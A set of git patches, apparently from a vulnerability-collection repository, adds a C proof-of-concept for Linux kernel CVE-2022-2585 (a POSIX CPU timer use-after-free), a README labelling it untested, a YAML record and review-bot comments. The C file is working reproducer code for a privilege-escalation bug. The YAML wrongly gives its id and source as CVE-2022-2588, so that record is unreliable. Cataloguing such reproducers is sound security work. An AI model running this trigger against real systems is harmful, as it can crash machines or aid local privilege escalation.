From cde79f2929eabbab3999219d8890af24a3d2416e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:08:28 +0000
Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-2585?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2022/CVE-2022-2585/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep

diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 31f78796023d0f18c51a34d185cdfbc80249b4e0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:08:43 +0000
Subject: [PATCH 2/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-2585/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2022/CVE-2022-2585/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep

diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From bbc222eb69edf3997ba392712b349268b7d2e041 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:09:12 +0000
Subject: [PATCH 3/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-2585?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2022/CVE-2022-2585/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep

diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee
From 010611cb389e4366225ed3ed22c4ecd1951fbe8d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:09:38 +0000
Subject: [PATCH 4/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E4=BA=86Linux-Kernel?= =?UTF-8?q?=E7=9A=84CVE-2022-2585=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 侯鹏林
---
 .../2022/CVE-2022-2585/CVE-2022-2585.c | 46 +++++++++++++++++++
 cve/linux-kernel/2022/CVE-2022-2585/README.md | 17 +++++++
 2 files changed, 63 insertions(+)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/README.md

diff --git a/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c b/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c
new file mode 100644
index 00000000..3cd22a03
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c
@@ -0,0 +1,46 @@
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static int timer_uaf(void *d)
+{
+ timer_t tid;
+ struct itimerspec its;
+
+ its.it_interval.tv_sec = 3;
+ its.it_interval.tv_nsec = 0;
+ its.it_value.tv_sec = 3;
+ its.it_value.tv_nsec = 0;
+ timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid);
+ timer_settime(tid, 0, &its, NULL);
+ execlp("./poc", "poc1", NULL);
+}
+
+static char stack[8192];
+
+int main(int argc, char **argv)
+{
+ timer_t tid;
+ int i;
+
+ if (!strcmp(argv[0], "poc1")) {
+ sleep(2);
+ exit(0);
+ }
+
+ if (fork() > 0) {
+ waitpid(-1, NULL, 0);
+ exit(0);
+ }
+
+ clone(timer_uaf, stack+4096, SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL, NULL, NULL);
+
+ while(1);
+
+ return 0;
+}
diff --git a/cve/linux-kernel/2022/CVE-2022-2585/README.md b/cve/linux-kernel/2022/CVE-2022-2585/README.md
new file mode 100644
index 00000000..297b795d
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2585/README.md
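Review bot: `timer_uaf` is declared `static int` but falls off the end without a return statement — `execlp()` only returns on failure, so if `./poc` cannot be executed the cloned thread returns an indeterminate value and the parent carries on into the `while(1)` spin as if setup had succeeded; add `perror("execlp"); _exit(1);` after the `execlp` call. The return values of `timer_create`, `timer_settime`, `fork` and `clone` are likewise unchecked, so a run on a kernel where one of them fails is indistinguishable from a run where the reproducer simply did not trigger; checking each and printing `strerror(errno)` would make a negative result meaningful. `strcmp(argv[0], "poc1")` in `main` dereferences `argv[0]` without guarding `argc >= 1`, and the locals `tid` and `i` in `main` and the parameter `d` are unused. The `#include` lines appear with their header names stripped in this rendering — presumably an extraction artefact, but worth confirming the committed file compiles. A file header comment stating that this is the untested reproducer described in the accompanying README and naming its origin (the oss-sec post the README links) would let a reviewer judge provenance without opening the README.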
@@ -0,0 +1,17 @@
+# 2022-LPE-UAF
+
+Untested POC code
+
+
+Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. The proof-of-concept code is publicly available increasing the likelihood of exploitation in the wild.
+
+##### Paper on Dirtycred by Zhenpeng
+https://zplin.me/papers/DirtyCred-Zhenpeng.pdf
+
+Patches for DirtyCred and the public release of the PoC https://github.com/Markakd/DirtyCred
+
+CVE-2022-2585 - Linux kernel POSIX CPU timer UAF 'PoC' code source:
+https://seclists.org/oss-sec/2022/q3/133
+
+Linux kernel cls_route UAF 'PoC' code source:
+https://seclists.org/oss-sec/2022/q3/132
-- 
Gitee

From c4a48e182fffe523f892bf7e8badb0fe14ef259f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:09:46 +0000
Subject: [PATCH 5/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-2585/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2022/CVE-2022-2585/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep

diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From 7a576d8889e2297a5444927f045510dd357ed078 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:10:17 +0000
Subject: [PATCH 6/7] =?UTF-8?q?CVE-2022-2585=E7=9A=84yaml=E6=96=87?= =?UTF-8?q?=E4=BB=B6?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 侯鹏林
---
 cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml
new file mode 100644
index 00000000..ca0e808a
--- /dev/null
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-2588
+source: https://github.com/Markakd/CVE-2022-2588
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ A use-after-free flaw was found in the Linux kernel’s POSIX CPU timers functionality in the way a user creates and then deletes the timer in the non-leader thread of the program. This flaw allows a local user to crash or potentially escalate their privileges on the system.
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://access.redhat.com/security/cve/cve-2022-2585
+ - https://ubuntu.com/security/CVE-2022-2585
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-2585
+ cwe-id: CWE-416
+ cnvd-id: NONE
+ kve-id: NONE
+ tags: UAF, 拒绝服务, 权限提升
\ No newline at end of file
-- 
Gitee

From 6a5ef2412bea7ec9d6e0bc87c9daf458d1eb9313 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?=
Date: Thu, 16 Mar 2023 09:11:28 +0000
Subject: [PATCH 7/7] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 侯鹏林
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index dfa49367..7a03b6ab 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,7 @@ cve:
 - CVE-2022-25265
 - CVE-2022-41218
 - CVE-2019-13272
+ - CVE-2022-2585
 sudo:
 - CVE-2021-3156
 - CVE-2023-22809
-- 
Gitee
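Review bot: The top-level `id` reads `CVE-2022-2588` and `source` points at a CVE-2022-2588 repository, while the file name, `cve-id`, both `reference` links and the `description` all describe CVE-2022-2585 (the POSIX CPU timer use-after-free), so the record mislabels the vulnerability it documents; it should read `id: CVE-2022-2585`, and `source` should point at the origin of this CVE's reproducer (the README in the earlier patch cites an oss-sec post) rather than another CVE's repository. If anything keys on `id` — the `openkylin_list.yaml` entry added in the last patch lists CVE-2022-2585 — it will presumably not match this record as written. `name` holds a sentence describing the Linux kernel rather than a product name; the sibling fields suggest a short name is expected, though the schema is not visible here. The file also ends without a trailing newline.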